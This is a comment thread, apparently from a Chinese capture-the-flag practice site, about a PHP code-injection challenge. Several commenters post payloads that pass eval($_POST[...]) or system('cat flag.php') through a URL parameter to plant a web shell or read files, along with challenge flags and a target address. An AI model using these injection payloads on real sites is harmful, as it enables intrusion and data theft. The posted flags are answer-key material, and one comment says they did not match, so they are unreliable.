/?hello=eval($_POST['attack']) 蚁剑连接 找到flag.php文件中找到flag或/?hello=highlight_file(flag.php)直接在网页中查看flag
?hello=eval($_POST["cmd"])然后用蚁剑连,密码cmd
?hello=new Exception(system('cat flag.php'))
https://blog.csdn.net/guanrongl/article/details/142799641
flag{af99d77f1a8c71a69e7580a441f9c641};
flag{0c78799e8e21e8c1154621869960e3bf}
怎么我开启的环境和评论区好像不太一样,我里面是上传一个.jpg/.png后缀的文件,自动被当做python运行结果回显在页面注释里。很简单,但是获取到flag提交是错的
flag{b95f883f8d6d2a1096aad77516c046c3}
根据网页提示,hello作为参数提交 浏览器输入http://114.67.175.224:17573/?hello=hello,bp抓包 根据网友提示,对抓包url地址修改
...
评论
Pearpeach1 1月前
举报
/?hello=eval($_POST['attack']) 蚁剑连接 找到flag.php文件中找到flag或/?hello=highlight_file(flag.php)直接在网页中查看flag
星空 1月前
举报
?hello=eval($_POST["cmd"])然后用蚁剑连,密码cmd
springCloud 1月前
举报
?hello=new Exception(system('cat flag.php'))
小白帽来挖个漏洞 1月前
举报
https://blog.csdn.net/guanrongl/article/details/142799641
czhf20120704 2月前
举报
flag{af99d77f1a8c71a69e7580a441f9c641};
翻斗花园牛爷爷 2月前
举报
flag{0c78799e8e21e8c1154621869960e3bf}
turriT0Psis 2月前
举报
怎么我开启的环境和评论区好像不太一样,我里面是上传一个.jpg/.png后缀的文件,自动被当做python运行结果回显在页面注释里。很简单,但是获取到flag提交是错的
fairytale0717 3月前
举报
flag{0c78799e8e21e8c1154621869960e3bf}
XmN<=GzR 4月前
举报
flag{b95f883f8d6d2a1096aad77516c046c3}
endual 4月前
举报
根据网页提示,hello作为参数提交 浏览器输入http://114.67.175.224:17573/?hello=hello,bp抓包 根据网友提示,对抓包url地址修改